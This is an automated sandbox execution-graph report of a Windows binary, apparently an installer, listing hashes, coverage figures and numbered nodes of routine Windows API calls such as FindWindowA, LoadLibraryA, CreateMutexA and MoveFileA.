                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458359878-0
                                                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4.6%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:105
                                                                                                                            execution_graph 49966 40cd00 49967 40cd12 49966->49967 49968 40cd0d 49966->49968 49970 406f48 CloseHandle 49968->49970 49970->49967 49971 492848 49972 49287c 49971->49972 49973 49287e 49972->49973 49974 492892 49972->49974 50117 446f9c 32 API calls 49973->50117 49977 4928ce 49974->49977 49978 4928a1 49974->49978 49976 492887 Sleep 50037 4928c9 49976->50037 49983 49290a 49977->49983 49984 4928dd 49977->49984 50107 446ff8 49978->50107 49982 4928b0 49985 4928b8 FindWindowA 49982->49985 49989 492919 49983->49989 49990 492960 49983->49990 49986 446ff8 32 API calls 49984->49986 50111 447278 49985->50111 49988 4928ea 49986->49988 49992 4928f2 FindWindowA 49988->49992 50118 446f9c 32 API calls 49989->50118 49996 4929bc 49990->49996 49997 49296f 49990->49997 49994 447278 19 API calls 49992->49994 49993 492925 50119 446f9c 32 API calls 49993->50119 50050 492905 49994->50050 50004 492a18 49996->50004 50005 4929cb 49996->50005 50122 446f9c 32 API calls 49997->50122 49999 492932 50120 446f9c 32 API calls 49999->50120 50000 49297b 50123 446f9c 32 API calls 50000->50123 50003 49293f 50121 446f9c 32 API calls 50003->50121 50015 492a52 50004->50015 50016 492a27 50004->50016 50127 446f9c 32 API calls 50005->50127 50006 492988 50124 446f9c 32 API calls 50006->50124 50010 49294a SendMessageA 50014 447278 19 API calls 50010->50014 50011 4929d7 50128 446f9c 32 API calls 50011->50128 50013 492995 50125 446f9c 32 API calls 50013->50125 50014->50050 50024 492a61 50015->50024 50025 492aa0 50015->50025 50019 446ff8 32 API calls 50016->50019 50017 4929e4 50129 446f9c 32 API calls 50017->50129 50022 492a34 50019->50022 50021 4929a0 PostMessageA 50126 4470d0 19 API calls 50021->50126 50029 492a3c RegisterClipboardFormatA 50022->50029 50023 4929f1 50130 446f9c 32 API calls 50023->50130 50132 446f9c 32 API calls 50024->50132 50033 492aaf 50025->50033 50039 492af4 50025->50039 50030 447278 19 API calls 50029->50030 50030->50037 50031 4929fc SendNotifyMessageA 50131 4470d0 19 API calls 50031->50131 50032 492a6d 50133 446f9c 32 API calls 50032->50133 50135 446f9c 32 API calls 50033->50135 50157 403420 50037->50157 50038 492a7a 50134 446f9c 32 API calls 50038->50134 50044 492b48 50039->50044 50045 492b03 50039->50045 50040 492abb 50136 446f9c 32 API calls 50040->50136 50043 492a85 SendMessageA 50047 447278 19 API calls 50043->50047 50054 492baa 50044->50054 50055 492b57 50044->50055 50139 446f9c 32 API calls 50045->50139 50046 492ac8 50137 446f9c 32 API calls 50046->50137 50047->50050 50050->50037 50051 492b0f 50140 446f9c 32 API calls 50051->50140 50053 492ad3 PostMessageA 50138 4470d0 19 API calls 50053->50138 50062 492bb9 50054->50062 50063 492c31 50054->50063 50058 446ff8 32 API calls 50055->50058 50056 492b1c 50141 446f9c 32 API calls 50056->50141 50060 492b64 50058->50060 50143 42e394 SetErrorMode 50060->50143 50061 492b27 SendNotifyMessageA 50142 4470d0 19 API calls 50061->50142 50066 446ff8 32 API calls 50062->50066 50071 492c40 50063->50071 50072 492c66 50063->50072 50068 492bc8 50066->50068 50067 492b71 50069 492b87 GetLastError 50067->50069 50070 492b77 50067->50070 50146 446f9c 32 API calls 50068->50146 50073 447278 19 API calls 50069->50073 50074 447278 19 API calls 50070->50074 50151 446f9c 32 API calls 50071->50151 50081 492c98 50072->50081 50082 492c75 50072->50082 50075 492b85 50073->50075 50074->50075 50078 447278 19 API calls 50075->50078 50077 492c4a FreeLibrary 50152 4470d0 19 API calls 50077->50152 50078->50037 50090 492ca7 50081->50090 50096 492cdb 50081->50096 50086 446ff8 32 API calls 50082->50086 50083 492bdb GetProcAddress 50084 492c21 50083->50084 50085 492be7 50083->50085 50150 4470d0 19 API calls 50084->50150 50147 446f9c 32 API calls 50085->50147 50088 492c81 50086->50088 50094 492c89 CreateMutexA 50088->50094 50153 48ccc8 32 API calls 50090->50153 50091 492bf3 50148 446f9c 32 API calls 50091->50148 50094->50037 50095 492c00 50099 447278 19 API calls 50095->50099 50096->50037 50155 48ccc8 32 API calls 50096->50155 50098 492cb3 50100 492cc4 OemToCharBuffA 50098->50100 50101 492c11 50099->50101 50154 48cce0 19 API calls 50100->50154 50149 4470d0 19 API calls 50101->50149 50104 492cf6 50105 492d07 CharToOemBuffA 50104->50105 50156 48cce0 19 API calls 50105->50156 50108 447000 50107->50108 50161 436078 50108->50161 50110 44701f 50110->49982 50112 447280 50111->50112 50274 4363e0 VariantClear 50112->50274 50114 4472a3 50115 4472ba 50114->50115 50275 408c0c 18 API calls 50114->50275 50115->50037 50117->49976 50118->49993 50119->49999 50120->50003 50121->50010 50122->50000 50123->50006 50124->50013 50125->50021 50126->50050 50127->50011 50128->50017 50129->50023 50130->50031 50131->50037 50132->50032 50133->50038 50134->50043 50135->50040 50136->50046 50137->50053 50138->50050 50139->50051 50140->50056 50141->50061 50142->50037 50276 403738 50143->50276 50146->50083 50147->50091 50148->50095 50149->50050 50150->50050 50151->50077 50152->50037 50153->50098 50154->50037 50155->50104 50156->50037 50159 403426 50157->50159 50158 40344b 50159->50158 50160 402660 4 API calls 50159->50160 50160->50159 50162 436084 50161->50162 50172 4360a6 50161->50172 50162->50172 50181 408c0c 18 API calls 50162->50181 50163 436129 50190 408c0c 18 API calls 50163->50190 50165 436111 50185 403494 50165->50185 50166 436105 50166->50110 50167 4360f9 50176 403510 18 API calls 50167->50176 50168 4360ed 50182 403510 50168->50182 50169 43611d 50189 4040e8 32 API calls 50169->50189 50172->50163 50172->50165 50172->50166 50172->50167 50172->50168 50172->50169 50175 43613a 50175->50110 50180 436102 50176->50180 50178 436126 50178->50110 50180->50110 50181->50172 50191 4034e0 50182->50191 50186 403498 50185->50186 50187 4034ba 50186->50187 50188 402660 4 API calls 50186->50188 50187->50110 50188->50187 50189->50178 50190->50175 50196 4034bc 50191->50196 50193 4034f0 50201 403400 50193->50201 50197 4034c0 50196->50197 50198 4034dc 50196->50198 50205 402648 50197->50205 50198->50193 50202 403406 50201->50202 50203 40341f 50201->50203 50202->50203 50269 402660 50202->50269 50203->50110 50206 40264c 50205->50206 50209 402656 50205->50209 50211 402088 50206->50211 50207 402652 50207->50209 50222 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50207->50222 50209->50193 50212 40209c 50211->50212 50213 4020a1 50211->50213 50223 4019cc RtlInitializeCriticalSection 50212->50223 50215 4020c6 RtlEnterCriticalSection 50213->50215 50216 4020d0 50213->50216 50217 4020a5 50213->50217 50215->50216 50216->50217 50230 401f94 50216->50230 50217->50207 50220 4021f1 RtlLeaveCriticalSection 50221 4021fb 50220->50221 50221->50207 50222->50209 50224 4019f0 RtlEnterCriticalSection 50223->50224 50225 4019fa 50223->50225 50224->50225 50226 401a18 LocalAlloc 50225->50226 50227 401a32 50226->50227 50228 401a81 50227->50228 50229 401a77 RtlLeaveCriticalSection 50227->50229 50228->50213 50229->50228 50233 401fa4 50230->50233 50231 401fd0 50235 401ff4 50231->50235 50241 401db4 50231->50241 50233->50231 50233->50235 50236 401f0c 50233->50236 50235->50220 50235->50221 50245 40178c 50236->50245 50239 401f29 50239->50233 50242 401dd2 50241->50242 50243 401e02 50241->50243 50242->50235 50243->50242 50256 401d1c 50243->50256 50251 4017a8 50245->50251 50246 4014e4 LocalAlloc VirtualAlloc VirtualFree 50246->50251 50247 4017b2 50248 401678 VirtualAlloc 50247->50248 50252 4017be 50248->50252 50249 40180f 50249->50239 50255 401e80 9 API calls 50249->50255 50250 4013e0 LocalAlloc 50250->50251 50251->50246 50251->50247 50251->50249 50251->50250 50253 401803 50251->50253 50252->50249 50254 4015c0 VirtualFree 50253->50254 50254->50249 50255->50239 50257 401d2e 50256->50257 50258 401d51 50257->50258 50259 401d63 50257->50259 50260 401940 LocalAlloc VirtualFree VirtualFree 50258->50260 50261 401940 LocalAlloc VirtualFree VirtualFree 50259->50261 50262 401d61 50260->50262 50261->50262 50263 401bf8 9 API calls 50262->50263 50268 401d79 50262->50268 50265 401d88 50263->50265 50264 401da2 50267 401454 LocalAlloc 50264->50267 50265->50264 50266 401c4c 9 API calls 50265->50266 50266->50264 50267->50268 50268->50242 50270 402664 50269->50270 50271 40266e 50269->50271 50270->50271 50273 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50270->50273 50271->50203 50273->50271 50274->50114 50275->50115 50277 40373c LoadLibraryA 50276->50277 50277->50067 54050 498ba8 54108 403344 54050->54108 54052 498bb6 54111 4056a0 54052->54111 54054 498bbb 54114 40631c GetModuleHandleA GetProcAddress 54054->54114 54058 498bc5 54122 40994c 54058->54122 54389 4032fc 54108->54389 54110 403349 GetModuleHandleA GetCommandLineA 54110->54052 54113 4056db 54111->54113 54390 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54111->54390 54113->54054 54115 406338 54114->54115 54116 40633f GetProcAddress 54114->54116 54115->54116 54117 406355 GetProcAddress 54116->54117 54118 40634e 54116->54118 54119 406364 SetProcessDEPPolicy 54117->54119 54120 406368 54117->54120 54118->54117 54119->54120 54121 4063c4 6F561CD0 54120->54121 54121->54058 54391 409024 54122->54391 54389->54110 54390->54113 54392 408cbc 19 API calls 54391->54392 54393 409035 54392->54393 54394 4085dc GetSystemDefaultLCID 54393->54394 54397 408612 54394->54397 54395 406dec 19 API calls 54395->54397 54396 408568 19 API calls 54396->54397 54397->54395 54397->54396 54398 403450 18 API calls 54397->54398 54402 408674 54397->54402 54398->54397 54399 406dec 19 API calls 54399->54402 54400 408568 19 API calls 54400->54402 54401 403450 18 API calls 54401->54402 54402->54399 54402->54400 54402->54401 54403 4086f7 54402->54403 54404 403420 4 API calls 54403->54404 54405 408711 54404->54405 54406 408720 GetSystemDefaultLCID 54405->54406 54463 408568 GetLocaleInfoA 54406->54463 54409 403450 18 API calls 54410 408760 54409->54410 54411 408568 19 API calls 54410->54411 54412 408775 54411->54412 54413 408568 19 API calls 54412->54413 54414 408799 54413->54414 54469 4085b4 GetLocaleInfoA 54414->54469 54417 4085b4 GetLocaleInfoA 54418 4087c9 54417->54418 54419 408568 19 API calls 54418->54419 54420 4087e3 54419->54420 54421 4085b4 GetLocaleInfoA 54420->54421 54422 408800 54421->54422 54423 408568 19 API calls 54422->54423 54464 4085a1 54463->54464 54465 40858f 54463->54465 54467 403494 4 API calls 54464->54467 54466 4034e0 18 API calls 54465->54466 54468 40859f 54466->54468 54467->54468 54468->54409 54470 4085d0 54469->54470 54470->54417 55828 42f520 55829 42f52b 55828->55829 55830 42f52f NtdllDefWindowProc_A 55828->55830 55830->55829 50278 416b42 50279 416bea 50278->50279 50280 416b5a 50278->50280 50297 41531c 18 API calls 50279->50297 50282 416b74 SendMessageA 50280->50282 50283 416b68 50280->50283 50293 416bc8 50282->50293 50284 416b72 CallWindowProcA 50283->50284 50285 416b8e 50283->50285 50284->50293 50294 41a058 GetSysColor 50285->50294 50288 416b99 SetTextColor 50289 416bae 50288->50289 50295 41a058 GetSysColor 50289->50295 50291 416bb3 SetBkColor 50296 41a6e0 GetSysColor CreateBrushIndirect 50291->50296 50294->50288 50295->50291 50296->50293 50297->50293 55831 4358e0 55832 4358f5 55831->55832 55835 43590f 55832->55835 55837 4352c8 55832->55837 55844 435312 55837->55844 55847 4352f8 55837->55847 55838 403400 4 API calls 55839 435717 55838->55839 55839->55835 55850 435728 18 API calls 55839->55850 55840 446da4 18 API calls 55840->55847 55841 403744 18 API calls 55841->55847 55842 403450 18 API calls 55842->55847 55843 402648 18 API calls 55843->55847 55844->55838 55846 431ca0 18 API calls 55846->55847 55847->55840 55847->55841 55847->55842 55847->55843 55847->55844 55847->55846 55848 4038a4 18 API calls 55847->55848 55851 4343b0 55847->55851 55863 434b74 18 API calls 55847->55863 55848->55847 55850->55835 55852 43446d 55851->55852 55853 4343dd 55851->55853 55882 434310 18 API calls 55852->55882 55854 403494 4 API calls 55853->55854 55856 4343eb 55854->55856 55858 403778 18 API calls 55856->55858 55857 43445f 55859 403400 4 API calls 55857->55859 55861 43440c 55858->55861 55860 4344bd 55859->55860 55860->55847 55861->55857 55864 494944 55861->55864 55863->55847 55865 49497c 55864->55865 55866 494a14 55864->55866 55868 403494 4 API calls 55865->55868 55883 448930 55866->55883 55871 494987 55868->55871 55869 494997 55870 403400 4 API calls 55869->55870 55872 494a38 55870->55872 55871->55869 55873 4037b8 18 API calls 55871->55873 55874 403400 4 API calls 55872->55874 55876 4949b0 55873->55876 55875 494a40 55874->55875 55875->55861 55876->55869 55877 4037b8 18 API calls 55876->55877 55878 4949d3 55877->55878 55879 403778 18 API calls 55878->55879 55880 494a04 55879->55880 55881 403634 18 API calls 55880->55881 55881->55866 55882->55857 55884 448955 55883->55884 55885 448998 55883->55885 55886 403494 4 API calls 55884->55886 55888 4489ac 55885->55888 55895 44852c 55885->55895 55887 448960 55886->55887 55892 4037b8 18 API calls 55887->55892 55890 403400 4 API calls 55888->55890 55891 4489df 55890->55891 55891->55869 55893 44897c 55892->55893 55894 4037b8 18 API calls 55893->55894 55894->55885 55896 403494 4 API calls 55895->55896 55897 448562 55896->55897 55898 4037b8 18 API calls 55897->55898 55899 448574 55898->55899 55900 403778 18 API calls 55899->55900 55901 448595 55900->55901 55902 4037b8 18 API calls 55901->55902 55903 4485ad 55902->55903 55904 403778 18 API calls 55903->55904 55905 4485d8 55904->55905 55906 4037b8 18 API calls 55905->55906 55916 4485f0 55906->55916 55907 448628 55909 403420 4 API calls 55907->55909 55908 4486c3 55912 4486cb GetProcAddress 55908->55912 55913 448708 55909->55913 55910 44864b LoadLibraryExA 55910->55916 55911 44865d LoadLibraryA 55911->55916 55914 4486de 55912->55914 55913->55888 55914->55907 55915 403b80 18 API calls 55915->55916 55916->55907 55916->55908 55916->55910 55916->55911 55916->55915 55917 403450 18 API calls 55916->55917 55919 43da88 18 API calls 55916->55919 55917->55916 55919->55916 50298 416644 50299 416651 50298->50299 50300 4166ab 50298->50300 50305 416550 CreateWindowExA 50299->50305 50301 416658 SetPropA SetPropA 50301->50300 50302 41668b 50301->50302 50303 41669e SetWindowPos 50302->50303 50303->50300 50305->50301 55920 4222e4 55921 4222f3 55920->55921 55926 421274 55921->55926 55924 422313 55927 4212e3 55926->55927 55929 421283 55926->55929 55931 4212f4 55927->55931 55951 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55927->55951 55929->55927 55950 408d2c 33 API calls 55929->55950 55930 421322 55937 421395 55930->55937 55941 42133d 55930->55941 55931->55930 55932 4213ba 55931->55932 55934 4213ce SetMenu 55932->55934 55947 421393 55932->55947 55933 4213e6 55954 4211bc 24 API calls 55933->55954 55934->55947 55939 4213a9 55937->55939 55937->55947 55938 4213ed 55938->55924 55949 4221e8 10 API calls 55938->55949 55942 4213b2 SetMenu 55939->55942 55943 421360 GetMenu 55941->55943 55941->55947 55942->55947 55944 421383 55943->55944 55945 42136a 55943->55945 55952 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55944->55952 55948 42137d SetMenu 55945->55948 55947->55933 55953 421e2c 25 API calls 55947->55953 55948->55944 55949->55924 55950->55929 55951->55931 55952->55947 55953->55933 55954->55938 50306 4162ca 50307 4162f6 50306->50307 50308 4162d6 GetClassInfoA 50306->50308 50308->50307 50309 4162ea GetClassInfoA 50308->50309 50309->50307 55955 44b4a8 55956 44b4b6 55955->55956 55958 44b4d5 55955->55958 55957 44b38c 25 API calls 55956->55957 55956->55958 55957->55958 55959 448728 55960 448756 55959->55960 55961 44875d 55959->55961 55964 403400 4 API calls 55960->55964 55962 448771 55961->55962 55965 44852c 21 API calls 55961->55965 55962->55960 55963 403494 4 API calls 55962->55963 55966 44878a 55963->55966 55967 448907 55964->55967 55965->55962 55968 4037b8 18 API calls 55966->55968 55969 4487a6 55968->55969 55970 4037b8 18 API calls 55969->55970 55971 4487c2 55970->55971 55971->55960 55972 4487d6 55971->55972 55973 4037b8 18 API calls 55972->55973 55974 4487f0 55973->55974 55975 431bd0 18 API calls 55974->55975 55976 448812 55975->55976 55977 448832 55976->55977 55978 431ca0 18 API calls 55976->55978 55979 448870 55977->55979 56002 4435d0 18 API calls 55977->56002 55978->55976 55980 448888 55979->55980 56003 4435d0 18 API calls 55979->56003 55991 442334 55980->55991 55983 4488bc GetLastError 56004 4484c0 18 API calls 55983->56004 55986 4488cb 56005 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55986->56005 55988 4488e0 56006 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55988->56006 55990 4488e8 55992 443312 55991->55992 55993 44236d 55991->55993 55995 403400 4 API calls 55992->55995 55994 403400 4 API calls 55993->55994 55996 442375 55994->55996 55997 443327 55995->55997 55998 431bd0 18 API calls 55996->55998 55997->55983 55999 442381 55998->55999 56000 443302 55999->56000 56007 441a0c 18 API calls 55999->56007 56000->55983 56002->55977 56003->55980 56004->55986 56005->55988 56006->55990 56007->55999 56008 4165ec DestroyWindow 56009 42e3ef SetErrorMode 50310 441394 50311 44139d 50310->50311 50312 4413ab WriteFile 50310->50312 50311->50312 50313 4413b6 50312->50313 56010 491bf8 56011 491c32 56010->56011 56012 491c3e 56011->56012 56013 491c34 56011->56013 56015 491c4d 56012->56015 56016 491c76 56012->56016 56205 409098 MessageBeep 56013->56205 56018 446ff8 32 API calls 56015->56018 56023 491cae 56016->56023 56024 491c85 56016->56024 56017 403420 4 API calls 56019 49228a 56017->56019 56020 491c5a 56018->56020 56021 403400 4 API calls 56019->56021 56206 406bb0 56020->56206 56025 492292 56021->56025 56030 491cbd 56023->56030 56031 491ce6 56023->56031 56027 446ff8 32 API calls 56024->56027 56029 491c92 56027->56029 56214 406c00 18 API calls 56029->56214 56033 446ff8 32 API calls 56030->56033 56038 491d0e 56031->56038 56039 491cf5 56031->56039 56036 491cca 56033->56036 56034 491c9d 56215 44734c 19 API calls 56034->56215 56216 406c34 18 API calls 56036->56216 56045 491d1d 56038->56045 56046 491d42 56038->56046 56218 407280 19 API calls 56039->56218 56041 491cd5 56217 44734c 19 API calls 56041->56217 56042 491cfd 56219 44734c 19 API calls 56042->56219 56047 446ff8 32 API calls 56045->56047 56049 491d7a 56046->56049 56050 491d51 56046->56050 56048 491d2a 56047->56048 56051 4072a8 SetCurrentDirectoryA 56048->56051 56057 491d89 56049->56057 56058 491db2 56049->56058 56052 446ff8 32 API calls 56050->56052 56053 491d32 56051->56053 56054 491d5e 56052->56054 56220 4470d0 19 API calls 56053->56220 56056 42c804 19 API calls 56054->56056 56059 491d69 56056->56059 56060 446ff8 32 API calls 56057->56060 56063 491dfe 56058->56063 56064 491dc1 56058->56064 56221 44734c 19 API calls 56059->56221 56062 491d96 56060->56062 56222 4071f8 22 API calls 56062->56222 56070 491e0d 56063->56070 56071 491e36 56063->56071 56066 446ff8 32 API calls 56064->56066 56069 491dd0 56066->56069 56067 491da1 56223 44734c 19 API calls 56067->56223 56072 446ff8 32 API calls 56069->56072 56073 446ff8 32 API calls 56070->56073 56078 491e6e 56071->56078 56079 491e45 56071->56079 56074 491de1 56072->56074 56075 491e1a 56073->56075 56224 4918fc 22 API calls 56074->56224 56077 42c8a4 19 API calls 56075->56077 56081 491e25 56077->56081 56086 491e7d 56078->56086 56087 491ea6 56078->56087 56082 446ff8 32 API calls 56079->56082 56080 491ded 56225 44734c 19 API calls 56080->56225 56226 44734c 19 API calls 56081->56226 56085 491e52 56082->56085 56088 42c8cc 19 API calls 56085->56088 56089 446ff8 32 API calls 56086->56089 56094 491ede 56087->56094 56095 491eb5 56087->56095 56090 491e5d 56088->56090 56092 491e8a 56089->56092 56227 44734c 19 API calls 56090->56227 56228 42c8fc 19 API calls 56092->56228 56101 491eed 56094->56101 56102 491f16 56094->56102 56096 446ff8 32 API calls 56095->56096 56098 491ec2 56096->56098 56097 491e95 56229 44734c 19 API calls 56097->56229 56100 42c92c 19 API calls 56098->56100 56103 491ecd 56100->56103 56104 446ff8 32 API calls 56101->56104 56107 491f62 56102->56107 56108 491f25 56102->56108 56230 44734c 19 API calls 56103->56230 56106 491efa 56104->56106 56109 42c954 19 API calls 56106->56109 56115 491f71 56107->56115 56116 491fb4 56107->56116 56110 446ff8 32 API calls 56108->56110 56111 491f05 56109->56111 56112 491f34 56110->56112 56231 44734c 19 API calls 56111->56231 56114 446ff8 32 API calls 56112->56114 56118 491f45 56114->56118 56117 446ff8 32 API calls 56115->56117 56123 491fc3 56116->56123 56124 492027 56116->56124 56119 491f84 56117->56119 56232 42c4f8 19 API calls 56118->56232 56121 446ff8 32 API calls 56119->56121 56125 491f95 56121->56125 56122 491f51 56233 44734c 19 API calls 56122->56233 56127 446ff8 32 API calls 56123->56127 56131 492066 56124->56131 56132 492036 56124->56132 56234 491af4 26 API calls 56125->56234 56129 491fd0 56127->56129 56197 42c608 21 API calls 56129->56197 56130 491fa3 56235 44734c 19 API calls 56130->56235 56142 4920a5 56131->56142 56143 492075 56131->56143 56135 446ff8 32 API calls 56132->56135 56139 492043 56135->56139 56136 491fde 56137 491fe2 56136->56137 56138 492017 56136->56138 56141 446ff8 32 API calls 56137->56141 56237 4470d0 19 API calls 56138->56237 56140 452908 5 API calls 56139->56140 56145 492050 56140->56145 56146 491ff1 56141->56146 56151 4920e4 56142->56151 56152 4920b4 56142->56152 56147 446ff8 32 API calls 56143->56147 56238 4470d0 19 API calls 56145->56238 56198 452c80 56146->56198 56150 492082 56147->56150 56154 452770 5 API calls 56150->56154 56161 49212c 56151->56161 56162 4920f3 56151->56162 56155 446ff8 32 API calls 56152->56155 56153 492001 56236 4470d0 19 API calls 56153->56236 56157 49208f 56154->56157 56158 4920c1 56155->56158 56239 4470d0 19 API calls 56157->56239 56240 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56158->56240 56167 49213b 56161->56167 56168 492174 56161->56168 56164 446ff8 32 API calls 56162->56164 56163 4920ce 56241 4470d0 19 API calls 56163->56241 56166 492102 56164->56166 56169 446ff8 32 API calls 56166->56169 56170 446ff8 32 API calls 56167->56170 56173 492187 56168->56173 56180 49223d 56168->56180 56171 492113 56169->56171 56172 49214a 56170->56172 56175 447278 19 API calls 56171->56175 56174 446ff8 32 API calls 56172->56174 56176 446ff8 32 API calls 56173->56176 56177 49215b 56174->56177 56178 491c39 56175->56178 56179 4921b4 56176->56179 56184 447278 19 API calls 56177->56184 56178->56017 56181 446ff8 32 API calls 56179->56181 56180->56178 56245 446f9c 32 API calls 56180->56245 56182 4921cb 56181->56182 56242 407ddc 21 API calls 56182->56242 56184->56178 56185 492256 56186 42e8c8 19 API calls 56185->56186 56187 49225e 56186->56187 56246 44734c 19 API calls 56187->56246 56190 4921ed 56191 446ff8 32 API calls 56190->56191 56192 492201 56191->56192 56243 408508 18 API calls 56192->56243 56194 49220c 56244 44734c 19 API calls 56194->56244 56196 492218 56197->56136 56199 452724 2 API calls 56198->56199 56201 452c99 56199->56201 56200 452c9d 56200->56153 56201->56200 56202 452cc1 MoveFileA GetLastError 56201->56202 56203 452760 Wow64RevertWow64FsRedirection 56202->56203 56204 452ce7 56203->56204 56204->56153 56205->56178 56207 406bbf 56206->56207 56208 406bd8 56207->56208 56210 406be1 56207->56210 56209 403400 4 API calls 56208->56209 56211 406bdf 56209->56211 56212 403778 18 API calls 56210->56212 56213 44734c 19 API calls 56211->56213 56212->56211 56213->56178 56214->56034 56215->56178 56216->56041 56217->56178 56218->56042 56219->56178 56220->56178 56221->56178 56222->56067 56223->56178 56224->56080 56225->56178 56226->56178 56227->56178 56228->56097 56229->56178 56230->56178 56231->56178 56232->56122 56233->56178 56234->56130 56235->56178 56236->56178 56237->56178 56238->56178 56239->56178 56240->56163 56241->56178 56242->56190 56243->56194 56244->56196 56245->56185 56246->56178 56247 40cc34 56250 406f10 WriteFile 56247->56250 56251 406f2d 56250->56251 50314 48095d 50319 451004 50314->50319 50316 480971 50329 47fa0c 50316->50329 50318 480995 50320 451011 50319->50320 50322 451065 50320->50322 50338 408c0c 18 API calls 50320->50338 50335 450e88 50322->50335 50326 45108d 50327 4510d0 50326->50327 50340 408c0c 18 API calls 50326->50340 50327->50316 50345 40b3c8 50329->50345 50331 47fa79 50331->50318 50334 47fa2e 50334->50331 50349 4069dc 50334->50349 50352 476994 50334->50352 50341 450e34 50335->50341 50338->50322 50339 408c0c 18 API calls 50339->50326 50340->50327 50342 450e46 50341->50342 50343 450e57 50341->50343 50344 450e4b InterlockedExchange 50342->50344 50343->50326 50343->50339 50344->50343 50346 40b3d3 50345->50346 50347 40b3f3 50346->50347 50368 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50346->50368 50347->50334 50350 402648 18 API calls 50349->50350 50351 4069e7 50350->50351 50351->50334 50363 4769c5 50352->50363 50366 476a0e 50352->50366 50353 476a59 50369 451294 50353->50369 50355 476a70 50357 403420 4 API calls 50355->50357 50359 476a8a 50357->50359 50358 4038a4 18 API calls 50358->50366 50359->50334 50362 403450 18 API calls 50362->50366 50365 451294 35 API calls 50363->50365 50363->50366 50375 4038a4 50363->50375 50384 403744 50363->50384 50388 403450 50363->50388 50364 403744 18 API calls 50364->50366 50365->50363 50366->50353 50366->50358 50366->50362 50366->50364 50367 451294 35 API calls 50366->50367 50367->50366 50368->50347 50370 4512af 50369->50370 50374 4512a4 50369->50374 50394 451238 35 API calls 50370->50394 50372 4512ba 50372->50374 50395 408c0c 18 API calls 50372->50395 50374->50355 50377 4038b1 50375->50377 50383 4038e1 50375->50383 50376 403400 4 API calls 50379 4038cb 50376->50379 50378 4038da 50377->50378 50380 4038bd 50377->50380 50381 4034bc 18 API calls 50378->50381 50379->50363 50396 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50380->50396 50381->50383 50383->50376 50385 40374a 50384->50385 50387 40375b 50384->50387 50386 4034bc 18 API calls 50385->50386 50385->50387 50386->50387 50387->50363 50389 403454 50388->50389 50390 403464 50388->50390 50389->50390 50392 4034bc 18 API calls 50389->50392 50391 403490 50390->50391 50393 402660 4 API calls 50390->50393 50391->50363 50392->50390 50393->50391 50394->50372 50395->50374 50396->50379 50397 41ee54 50398 41ee63 IsWindowVisible 50397->50398 50399 41ee99 50397->50399 50398->50399 50400 41ee6d IsWindowEnabled 50398->50400 50400->50399 50401 41ee77 50400->50401 50402 402648 18 API calls 50401->50402 50403 41ee81 EnableWindow 50402->50403 50403->50399 50404 46bb10 50405 46bb44 50404->50405 50436 46bfad 50404->50436 50409 46bbdc 50405->50409 50410 46bbba 50405->50410 50411 46bbcb 50405->50411 50412 46bb98 50405->50412 50413 46bba9 50405->50413 50422 46bb80 50405->50422 50406 403400 4 API calls 50408 46bfec 50406->50408 50417 403400 4 API calls 50408->50417 50727 46baa0 59 API calls 50409->50727 50460 46b6d0 50410->50460 50726 46b890 81 API calls 50411->50726 50724 46b420 61 API calls 50412->50724 50725 46b588 56 API calls 50413->50725 50421 46bff4 50417->50421 50420 46bb9e 50420->50422 50420->50436 50422->50436 50495 468c74 50422->50495 50423 46bc18 50423->50436 50439 46bc5b 50423->50439 50728 494da0 50423->50728 50426 46bd7e 50747 48358c 137 API calls 50426->50747 50427 414ae8 18 API calls 50427->50439 50430 46bd99 50430->50436 50431 42cbc0 20 API calls 50431->50439 50432 46af68 37 API calls 50432->50439 50434 403450 18 API calls 50434->50439 50436->50406 50437 46bdd7 50513 469f1c 50437->50513 50438 46af68 37 API calls 50438->50436 50439->50426 50439->50427 50439->50431 50439->50432 50439->50434 50439->50436 50439->50437 50456 46be9f 50439->50456 50498 468bb0 50439->50498 50506 46acd4 50439->50506 50651 483084 50439->50651 50764 46b1dc 33 API calls 50439->50764 50441 46be3d 50442 403450 18 API calls 50441->50442 50443 46be4d 50442->50443 50444 46bea9 50443->50444 50445 46be59 50443->50445 50450 46bf6b 50444->50450 50574 46af68 50444->50574 50748 457f1c 50445->50748 50449 457f1c 38 API calls 50449->50456 50456->50438 50765 46c424 50460->50765 50463 46b852 50465 403420 4 API calls 50463->50465 50467 46b86c 50465->50467 50466 46b71e 50468 46b83e 50466->50468 50772 455f84 27 API calls 50466->50772 50469 403400 4 API calls 50467->50469 50468->50463 50471 403450 18 API calls 50468->50471 50472 46b874 50469->50472 50471->50463 50473 403400 4 API calls 50472->50473 50474 46b87c 50473->50474 50474->50422 50475 46b801 50475->50463 50475->50468 50480 42cd48 21 API calls 50475->50480 50477 46b7a1 50477->50463 50477->50475 50782 42cd48 50477->50782 50479 46b73c 50479->50477 50773 466600 50479->50773 50482 46b817 50480->50482 50482->50468 50487 451458 18 API calls 50482->50487 50486 466600 33 API calls 50489 46b77c 50486->50489 50490 46b82e 50487->50490 50789 47efd0 56 API calls 50490->50789 50496 468bb0 33 API calls 50495->50496 50497 468c83 50496->50497 50497->50423 50499 468bdf 50498->50499 50500 4078f4 33 API calls 